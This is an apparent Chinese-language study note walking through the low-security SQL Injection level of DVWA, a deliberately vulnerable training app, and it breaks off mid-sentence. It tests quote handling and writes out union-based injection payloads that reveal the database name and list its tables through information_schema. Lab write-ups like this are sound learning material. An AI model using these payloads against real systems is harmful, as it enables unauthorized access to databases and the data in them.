#笔记(二十八)#dvwa漏洞SQL Injection wp

SQL Injection low 查看源代码,没有过滤 用1试没问题,1’不行,1’‘和1’#都没问题 先试一下爆库1’ union select 1,database()#,可以看到有回显,目前数据库dvwa 爆表 1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#,能看到
相关文章
相关标签/搜索